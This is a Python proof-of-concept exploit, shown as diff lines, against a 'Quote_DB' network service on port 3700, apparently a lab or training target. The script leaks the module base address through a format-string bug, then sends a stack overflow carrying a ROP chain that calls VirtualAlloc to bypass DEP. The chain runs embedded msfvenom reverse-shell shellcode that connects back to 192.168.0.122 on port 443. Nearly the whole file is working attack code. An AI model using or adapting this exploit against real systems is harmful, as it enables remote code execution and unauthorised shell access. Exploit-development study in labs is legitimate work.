| 1 | + | #!/usr/bin/python3 |
| 2 | + | |
| 3 | + | # Quote_DB PoC |
| 4 | + | # William Moody, 07.06.2021 |
| 5 | + | |
| 6 | + | from functools import update_wrapper |
| 7 | + | import socket |
| 8 | + | import sys |
| 9 | + | from struct import pack, unpack |
| 10 | + | |
| 11 | + | if len(sys.argv) != 2: |
| 12 | + | print("Usage: %s server" % sys.argv[0]) |
| 13 | + | sys.exit(1) |
| 14 | + | |
| 15 | + | server = sys.argv[1] |
| 16 | + | port = 3700 |
| 17 | + | |
| 18 | + | # === |
| 19 | + | |
| 20 | + | def send(opcode, data): |
| 21 | + | buf = pack("<I", opcode) |
| 22 | + | buf += data |
| 23 | + | |
| 24 | + | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 25 | + | s.connect((server, port)) |
| 26 | + | s.send(buf) |
| 27 | + | |
| 28 | + | try: |
| 29 | + | ret = s.recv(16384) |
| 30 | + | s.close() |
| 31 | + | |
| 32 | + | return ret |
| 33 | + | except: |
| 34 | + | return None |
| 35 | + | |
| 36 | + | # === |
| 37 | + | |
| 38 | + | def get_quote(index): |
| 39 | + | return send(901, pack("<I", index)) |
| 40 | + | |
| 41 | + | def add_quote(quote): |
| 42 | + | return send(902, quote) |
| 43 | + | |
| 44 | + | def bad_request(buf): |
| 45 | + | return send(800, buf) |
| 46 | + | |
| 47 | + | # === |
| 48 | + | |
| 49 | + | print("[+] Getting base address...") |
| 50 | + | |
| 51 | + | quote_id = unpack("<I", add_quote(b"%x " * 30))[0] |
| 52 | + | base_str = get_quote(quote_id).split(b" ")[8].decode() |
| 53 | + | base = (int(base_str, 16) // 0x10000) * 0x10000 |
| 54 | + | |
| 55 | + | print(" -- " + hex(base)) |
| 56 | + | |
| 57 | + | # === |
| 58 | + | |
| 59 | + | size = 5000 |
| 60 | + | ropSize = 500 |
| 61 | + | |
| 62 | + | # === |
| 63 | + | |
| 64 | + | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.122 LPORT=443 EXITFUNC=thread -f python -v shell |
| 65 | + | shell = b"\x90" * 20 |
| 66 | + | shell += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64" |
| 67 | + | shell += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" |
| 68 | + | shell += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c" |
| 69 | + | shell += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52" |
| 70 | + | shell += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" |
| 71 | + | shell += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49" |
| 72 | + | shell += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" |
| 73 | + | shell += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75" |
| 74 | + | shell += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b" |
| 75 | + | shell += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" |
| 76 | + | shell += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a" |
| 77 | + | shell += b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77" |
| 78 | + | shell += b"\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" |
| 79 | + | shell += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" |
| 80 | + | shell += b"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" |
| 81 | + | shell += b"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8" |
| 82 | + | shell += b"\x00\x7a\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56" |
| 83 | + | shell += b"\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c" |
| 84 | + | shell += b"\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5" |
| 85 | + | shell += b"\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" |
| 86 | + | shell += b"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" |
| 87 | + | shell += b"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56" |
| 88 | + | shell += b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" |
| 89 | + | shell += b"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08" |
| 90 | + | shell += b"\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6" |
| 91 | + | shell += b"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" |
| 92 | + | shell += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" |
| 93 | + | |
| 94 | + | # === |
| 95 | + | |
| 96 | + | rop = [ |
| 97 | + | # 1. Get ESP (in eax) |
| 98 | + | base + 0x2610, # xor eax, eax ; ret |
| 99 | + | base + 0x1eb1, # or eax, esp ; ret |
| 100 | + | |
| 101 | + | # 2. Get dummy call addr (in ebx) |
| 102 | + | base + 0x2b88, # pop ecx ; ret |
| 103 | + | 0x1ec, # eax + ? = dummy call |
| 104 | + | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 105 | + | 0xffffffff, # junk for pop ebx |
| 106 | + | base + 0x1ebb, # mov ebx, eax ; ret |
| 107 | + | |
| 108 | + | # 3. Deref virtualAlloc (in eax) |
| 109 | + | base + 0x2b87, # pop eax ; pop ecx ; ret |
| 110 | + | base + 0x4321c, # base + iat + virtualalloc |
| 111 | + | 0xffffffff, # junk for pop ecx |
| 112 | + | base + 0x1eb4, # mov eax, [eax] ; add ecx, 0x5 ; pop edx ; ret |
| 113 | + | 0xffffffff, # junk for pop edx |
| 114 | + | |
| 115 | + | # 4. Write virtual alloc to dummy |
| 116 | + | base + 0x1ec2, # mov [ebx], eax ; ret |
| 117 | + | |
| 118 | + | # 5. Get shellcode addr (in eax) |
| 119 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 120 | + | base + 0x2d3c, # mov eax, edx ; ret |
| 121 | + | base + 0x2b88, # pop ecx ; ret |
| 122 | + | 0x18, # eax + ? = dummy call |
| 123 | + | base + 0x9b86, # add eax, ecx ; pop ebx ; ret |
| 124 | + | 0xffffffff, # junk for pop ebx |
| 125 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 126 | + | |
| 127 | + | # 6. Get dummy call addr + 0x4 (in ebx) |
| 128 | + | base + 0x1eca, # add ebx, 0x4 ; ret |
| 129 | + | |
| 130 | + | # 7. Write shellcode addr to dummy + 0x4 |
| 131 | + | base + 0x1ec2, # mov [ebx], eax ; ret |
| 132 | + | |
| 133 | + | # 8. Get dummy call addr + 0x8 (in ebx) |
| 134 | + | base + 0x1eca, # add ebx, 0x8 ; ret |
| 135 | + | |
| 136 | + | # 9. Write shellcode addr to dummy + 0x8 |
| 137 | + | base + 0x1ec2, # mov [ebx], eax ; ret |
| 138 | + | |
| 139 | + | # 10. Align esp with dummy call (ebx-8) |
| 140 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 141 | + | base + 0x2b88, # pop ecx ; ret |
| 142 | + | 0xfffffff8, # edx + ? = dummy call |
| 143 | + | base + 0x1ece, # add edx, ecx ; ret |
| 144 | + | base + 0x1ec5, # xchg edx, ebx ; cmp ebx, eax ; ret |
| 145 | + | base + 0x1ebe, # xchg ebx, esp ; dec ecx ; ret |
| 146 | + | ] |
| 147 | + | rop = b"".join([pack("<I", r) for r in rop]) |
| 148 | + | |
| 149 | + | # === |
| 150 | + | |
| 151 | + | dummy = b"aaaa" # VirtualAlloc |
| 152 | + | dummy += b"bbbb" # return <- shellcode addr |
| 153 | + | dummy += b"cccc" # lpAddress <- shellcode addr |
| 154 | + | dummy += pack("<I", 0x1) # dwSize <- 0x1 |
| 155 | + | dummy += pack("<I", 0x1000) # flAllocationType <- 0x1000 |
| 156 | + | dummy += pack("<I", 0x40) # flProtect <- 0x40 |
| 157 | + | |
| 158 | + | # === |
| 159 | + | |
| 160 | + | buf = b"A" * 2060 |
| 161 | + | buf += rop |
| 162 | + | buf += b"B" * (ropSize - len(rop)) |
| 163 | + | buf += dummy |
| 164 | + | buf += shell |
| 165 | + | |
| 166 | + | # === |
| 167 | + | |
| 168 | + | print("[+] Triggering overflow...") |
| 169 | + | |
| 170 | + | bad_request(buf) |